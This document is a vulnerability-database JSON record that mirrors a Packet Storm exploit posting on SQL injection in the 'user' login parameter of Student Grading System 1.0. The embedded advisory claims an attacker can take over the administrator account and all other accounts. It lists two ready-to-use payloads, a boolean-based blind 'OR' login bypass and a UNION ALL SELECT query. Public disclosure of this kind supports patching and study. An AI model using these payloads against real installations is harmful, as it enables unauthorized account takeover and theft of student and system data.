{"id": "PACKETSTORM:166287", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Student Grading System 1.0 SQL Injection", "description": "", "published": "2022-03-14T00:00:00", "modified": "2022-03-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166287/Student-Grading-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-03-14T19:11:51", "viewCount": 65, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "vulnersScore": -0.1}, "_state": {"dependencies": 1647719310}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166287/sgs10-sql.txt", "sourceData": "`## Title: Student Grading System v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 03.14.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System \n \n## Description: \nThe `user` parameter appears to be vulnerable to SQL injection attacks. \nA single quote was submitted in the user parameter, and a database \nerror message was returned. \nTwo single quotes were then submitted and the error message disappeared. \nYou should review the contents of the error message, and the \napplication's handling of other input, to confirm whether a \nvulnerability is present. \nAn attacker can take control of the administrator account and of all \naccounts and file information on this system, and can also download \nall information about this system. 
\n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: user (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause \nPayload: user=-6693' OR 2950=2950-- qPwW&pwd=d0Y!w7s!B1 \n \nType: UNION query \nTitle: Generic UNION query (random number) - 6 columns \nPayload: user=-7952' UNION ALL SELECT \n5650,5650,CONCAT(0x71786a7a71,0x7564497973726b65496f6e5778706143684359517149546e46776d6843484a504e624e7967484c57,0x716b627171),5650,5650,5650-- \n-&pwd=d0Y!w7s!B1 \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/h0x4xl) \n \n \n`\n"}